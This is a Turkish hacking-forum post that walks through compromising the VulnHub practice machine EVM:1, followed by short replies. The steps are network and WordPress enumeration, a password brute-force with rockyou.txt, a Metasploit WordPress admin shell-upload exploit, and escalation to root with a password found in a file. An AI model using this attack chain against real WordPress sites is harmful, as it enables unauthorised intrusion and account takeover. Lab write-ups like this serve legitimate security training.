EVM:1 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere EVM:1 VulnHub Zafiyetli Makinesinin çözümünü göstereceğim.

APM7O5.png


https://www.vulnhub.com/entry/evm-1,391/

5xJRdf.png


Makine İsmi: EVM: 1

Yayınlanma Tarihi: 2 Kasım 2019

Yapımcı: Ic0de

Seri: EVM

Açıklama: Hedefte ki Flag.txt dosyasını bulmak ve root olmak

Dosya Boyutu: 780 MB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta





RGQJLC.gif


Öncelikle hedefin IP adresini öğrenmek için netdiscover aracını kullanıyoruz. Terminale
Kod:
sudo netdiscover
yazalım.

o8k0Vt.jpg


IP adresini yakaladık.

G393yS.jpg


Ardından NMAP taraması yaparak açık portlar hakkında bilgi toplayacağız. Terminale
Kod:
nmap -A 192.168.1.16
yazalım ve açık portlara bakalım. SSH ve 80 portu açık yani bir site var.

tS6Wrk.jpg


Siteye gidelim ve içeriğe bakalım. İçerikten pek de bir şey çıkmadı sadece mesaj olarak /wordpress vermişler.

1ZWnV8.jpg


Siteyi kazımak için dirb aracını kullanıyoruz. Terminale
Kod:
dirb http://192.168.1.16/
yazdık ve tamaya başladı. /wordpress dizinini buldu bizlere.

COzQw0.jpg


Siteyi açtım ve URL sonuna /wordpress ekledim. Bu şekilde bir arayüz karşıladı beni.

rT6Xwe.jpg


Wpscan ile daha fazla wordpress dizini ile ilgili bilgi toplayacağız. Terminale
Kod:
wpscan --url http://192.168.1.16/wordpress/ -e at -e ap -e u
yazarak taramayı başlatıyoruz. (ap : Tüm eklentileri
at : Tüm temaları
u : Oturum açmış bütün kullanıcıları listeler.)

KWqdPL.jpg


Gördüğünüz gibi c0rrupt3d_brain isimli bir kullanıcıyı yakaladı.

gWN7VK.jpg


Şimdi bu kullanıcı için kaba kuvvet saldırısı yapacağız bunun için de rockyou.txt dosyasını kullanacağız. Terminale
Kod:
wpscan --url http://192.168.1.16/wordpress/  -U c0rrupt3d_brain -P rockyou.txt dosya yolu
yazıyoruz.

Qsu4gJ.jpg


Tarama sonucu şifremizi buluyor şifre: 24992499 olarak bulduk.

4tKKmq.jpg


Exploit zamanı :) Terminale
Kod:
msfconsole
yazalım.

c7SgHR.jpg


Kod:
search webapp
yazalım bizlere siteye ilk girdiğimizde ipucu vermişti zaten.

7GJC4l.jpg


Burada exploit/unix/webapp/wp_admin_shell_upload exploitini kullanacağız.

PZRagP.jpg


Direk kullanmak için
Kod:
use 105
yazdım çünkü baş tarafından 105 id'si vardı. Ayarlarına bakmak için
Kod:
show options
yazalım.

01y1JM.jpg


Ayarları yapmak için
Kod:
set RHOSTS 192.168.1.16
set TARGETURU /wordpress
set USERNAME c0rrupt3d_brain
set PASSWORD 24992499
exploit
yazalım.
Ve içerideyiz.

zvK3RD.jpg


home dizinine gitmek içni
Kod:
cd /home
ve içeride ki bilgileri görmek için
Kod:
ls
yazdık. İçeride root3r dizinini gördük ve içeri girmek için
Kod:
cd root3r
ve bilgileri yazdırmak için
Kod:
ls
yazdık. İçeride ssh bağlantısının şifresi yazan bir dosya bulduk.

052fll.jpg


Bunu
Kod:
cat .root_password_ssh.txt
ile yazdırdığımda da şifreyi yani willy26 olduğunu öğrendik.

EwS5vK.jpg


Şimdi yetki yükseltme işlemi yapacağız. İlk olarak
Kod:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
yazarak yetki yükselttik. Şimdi
Kod:
 su root
şifreye de willy26 yazalım. Ardından
Kod:
cd /root
ls
cat proof.txt
yazarak işlemi bitirelim :)

gdiz0H.png



[ame="https://www.youtube.com/watch?v=rfbr6uLQJRk"]https://www.youtube.com/watch?v=rfbr6uLQJRk[/ame]





f4XPQV.png


Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla..


 
Son düzenleme:

x4807

Katılımcı Üye
10 Ağu 2019
985
17
Hocam güzel konu olmuş özellikle siber güvenlik klübü için bir ön bilgilendirme denebilir :) Ellerinize sağlık :)
 

By Ghost

Katılımcı Üye
11 Tem 2013
941
2
C:\Linux
Elinize sağlık hocam güzel bir anlatım olmuş :) Wordpress panel üzerinden de reverse shell yöntemi ile içeri sızabiliriz diye tahmin ediyorum. Yapılan işlem aynı oluyor ama söylemek istedim :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.